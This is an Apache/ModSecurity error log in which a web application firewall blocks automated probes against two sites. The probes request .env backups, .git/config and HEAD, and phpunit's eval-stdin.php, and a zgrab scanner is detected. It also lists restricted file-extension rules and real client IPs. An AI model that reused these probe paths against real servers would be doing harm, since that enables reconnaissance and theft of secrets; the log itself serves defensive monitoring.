[Wed Aug 13 06:10:10.253343 2025] [:error] [pid 1915763] [client 185.177.72.12:16988] [client 185.177.72.12] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.bak"] [unique_id "aJwQIt_0TTE-3HOKQ8mTIwAAAAQ"]
[Wed Aug 13 06:10:10.253616 2025] [:error] [pid 1915763] [client 185.177.72.12:16988] [client 185.177.72.12] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.bak"] [unique_id "aJwQIt_0TTE-3HOKQ8mTIwAAAAQ"]
[Wed Aug 13 06:10:10.253849 2025] [:error] [pid 1915763] [client 185.177.72.12:16988] [client 185.177.72.12] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.bak"] [unique_id "aJwQIt_0TTE-3HOKQ8mTIwAAAAQ"]
[Wed Aug 13 06:10:10.296168 2025] [:error] [pid 1915763] [client 185.177.72.12:16988] [client 185.177.72.12] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.old"] [unique_id "aJwQIt_0TTE-3HOKQ8mTJAAAAAQ"]
[Wed Aug 13 06:10:10.296336 2025] [:error] [pid 1915763] [client 185.177.72.12:16988] [client 185.177.72.12] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.old"] [unique_id "aJwQIt_0TTE-3HOKQ8mTJAAAAAQ"]
[Wed Aug 13 06:10:10.296774 2025] [:error] [pid 1915763] [client 185.177.72.12:16988] [client 185.177.72.12] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.old"] [unique_id "aJwQIt_0TTE-3HOKQ8mTJAAAAAQ"]
[Wed Aug 13 06:10:10.296980 2025] [:error] [pid 1915763] [client 185.177.72.12:16988] [client 185.177.72.12] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.old"] [unique_id "aJwQIt_0TTE-3HOKQ8mTJAAAAAQ"]
[Wed Aug 13 06:10:10.337134 2025] [:error] [pid 1915763] [client 185.177.72.12:16988] [client 185.177.72.12] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /config/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "aJwQIt_0TTE-3HOKQ8mTJQAAAAQ"]
[Wed Aug 13 06:10:10.337394 2025] [:error] [pid 1915763] [client 185.177.72.12:16988] [client 185.177.72.12] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "aJwQIt_0TTE-3HOKQ8mTJQAAAAQ"]
[Wed Aug 13 06:10:10.337589 2025] [:error] [pid 1915763] [client 185.177.72.12:16988] [client 185.177.72.12] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "aJwQIt_0TTE-3HOKQ8mTJQAAAAQ"]
[Wed Aug 13 07:43:34.987436 2025] [:error] [pid 1915763] [client 217.217.252.18:49582] [client 217.217.252.18] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aJwmBt_0TTE-3HOKQ8mTMgAAAAQ"]
[Wed Aug 13 07:43:34.987714 2025] [:error] [pid 1915763] [client 217.217.252.18:49582] [client 217.217.252.18] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aJwmBt_0TTE-3HOKQ8mTMgAAAAQ"]
[Wed Aug 13 07:43:34.987902 2025] [:error] [pid 1915763] [client 217.217.252.18:49582] [client 217.217.252.18] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aJwmBt_0TTE-3HOKQ8mTMgAAAAQ"]
[Wed Aug 13 07:43:35.742749 2025] [authz_core:error] [pid 1915760] [client 217.217.252.18:49610] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
[Wed Aug 13 13:09:54.881699 2025] [:error] [pid 1915763] [client 216.81.248.84:33830] [client 216.81.248.84] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aJxygt_0TTE-3HOKQ8mTtAAAAAQ"]
[Wed Aug 13 13:09:54.882157 2025] [:error] [pid 1915763] [client 216.81.248.84:33830] [client 216.81.248.84] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aJxygt_0TTE-3HOKQ8mTtAAAAAQ"]
[Wed Aug 13 13:09:54.882423 2025] [:error] [pid 1915763] [client 216.81.248.84:33830] [client 216.81.248.84] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aJxygt_0TTE-3HOKQ8mTtAAAAAQ"]
[Wed Aug 13 13:09:54.944588 2025] [:error] [pid 1915762] [client 216.81.248.84:33834] [client 216.81.248.84] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aJxygsOqbpx-jnPJ2LkHgQAAAAM"]
[Wed Aug 13 13:09:54.944857 2025] [:error] [pid 1915762] [client 216.81.248.84:33834] [client 216.81.248.84] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aJxygsOqbpx-jnPJ2LkHgQAAAAM"]
[Wed Aug 13 13:09:54.945036 2025] [:error] [pid 1915762] [client 216.81.248.84:33834] [client 216.81.248.84] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aJxygsOqbpx-jnPJ2LkHgQAAAAM"]
[Sat Aug 16 08:10:03.492832 2025] [:error] [pid 1991185] [client 94.130.132.56:50134] [client 94.130.132.56] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aKAgu-_-AI4RJh5hYJ1bkgAAAAU"]
[Sat Aug 16 08:10:03.494961 2025] [:error] [pid 1991185] [client 94.130.132.56:50134] [client 94.130.132.56] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aKAgu-_-AI4RJh5hYJ1bkgAAAAU"]
[Sat Aug 16 08:10:03.495172 2025] [:error] [pid 1991185] [client 94.130.132.56:50134] [client 94.130.132.56] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aKAgu-_-AI4RJh5hYJ1bkgAAAAU"]
[Sun Aug 17 18:30:41.359958 2025] [:error] [pid 2023005] [client 45.130.203.178:64905] [client 45.130.203.178] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/head"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/HEAD"] [unique_id "aKIDscn15lzFTcp_yYykWgAAAAs"]
[Sun Aug 17 18:30:41.360224 2025] [:error] [pid 2023005] [client 45.130.203.178:64905] [client 45.130.203.178] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/HEAD"] [unique_id "aKIDscn15lzFTcp_yYykWgAAAAs"]
[Sun Aug 17 18:30:41.360396 2025] [:error] [pid 2023005] [client 45.130.203.178:64905] [client 45.130.203.178] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/HEAD"] [unique_id "aKIDscn15lzFTcp_yYykWgAAAAs"]
[Mon Aug 18 02:37:51.458078 2025] [:error] [pid 2038166] [client 185.165.171.225:7020] [client 185.165.171.225] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aKJ138LjCPAhU-U28yKj9gAAAAI"]
[Mon Aug 18 02:37:51.458412 2025] [:error] [pid 2038166] [client 185.165.171.225:7020] [client 185.165.171.225] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aKJ138LjCPAhU-U28yKj9gAAAAI"]
[Mon Aug 18 02:37:51.458601 2025] [:error] [pid 2038166] [client 185.165.171.225:7020] [client 185.165.171.225] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aKJ138LjCPAhU-U28yKj9gAAAAI"]
[Thu Aug 21 08:15:27.394119 2025] [:error] [pid 2115007] [client 3.138.185.30:38467] [client 3.138.185.30] ModSecurity: Warning. Matched phrase "zgrab" at REQUEST_HEADERS:User-Agent. [file "/usr/share/modsecurity-crs/rules/REQUEST-913-SCANNER-DETECTION.conf"] [line "55"] [id "913100"] [msg "Found User-Agent associated with security scanner"] [data "Matched Data: zgrab found within REQUEST_HEADERS:User-Agent: mozilla/5.0 zgrab/0.x"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-reputation-scanner"] [tag "OWASP_CRS"] [tag "OWASP_CRS/AUTOMATION/SECURITY_SCANNER"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.38121.it"] [uri "/"] [unique_id "aKa5f62kg_W_Wr-muT7CjgAAAAE"]
[Thu Aug 21 08:15:27.395429 2025] [:error] [pid 2115007] [client 3.138.185.30:38467] [client 3.138.185.30] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/"] [unique_id "aKa5f62kg_W_Wr-muT7CjgAAAAE"]
[Thu Aug 21 08:15:27.395616 2025] [:error] [pid 2115007] [client 3.138.185.30:38467] [client 3.138.185.30] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/"] [unique_id "aKa5f62kg_W_Wr-muT7CjgAAAAE"]
[Sat Aug 23 04:18:41.935632 2025] [:error] [pid 2166866] [client 45.130.202.109:32997] [client 45.130.202.109] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/head"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/HEAD"] [unique_id "aKklAZV01XGeyX-9JrWW3wAAAAU"]
[Sat Aug 23 04:18:41.936455 2025] [:error] [pid 2166866] [client 45.130.202.109:32997] [client 45.130.202.109] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/HEAD"] [unique_id "aKklAZV01XGeyX-9JrWW3wAAAAU"]
[Sat Aug 23 04:18:41.936614 2025] [:error] [pid 2166866] [client 45.130.202.109:32997] [client 45.130.202.109] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/HEAD"] [unique_id "aKklAZV01XGeyX-9JrWW3wAAAAU"]
[Sat Aug 23 12:06:22.843229 2025] [:error] [pid 2167296] [client 67.213.121.215:35158] [client 67.213.121.215] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aKmSnjcE0lLEJFMEJfm98QAAAAg"]
[Sat Aug 23 12:06:22.845287 2025] [:error] [pid 2167296] [client 67.213.121.215:35158] [client 67.213.121.215] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aKmSnjcE0lLEJFMEJfm98QAAAAg"]
[Sat Aug 23 12:06:22.845457 2025] [:error] [pid 2167296] [client 67.213.121.215:35158] [client 67.213.121.215] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aKmSnjcE0lLEJFMEJfm98QAAAAg"]
[Sat Aug 23 12:06:22.859803 2025] [:error] [pid 2169502] [client 67.213.121.215:35164] [client 67.213.121.215] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aKmSnpSxcXGgFs-ixH5-tAAAAAo"]
[Sat Aug 23 12:06:22.860086 2025] [:error] [pid 2169502] [client 67.213.121.215:35164] [client 67.213.121.215] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aKmSnpSxcXGgFs-ixH5-tAAAAAo"]
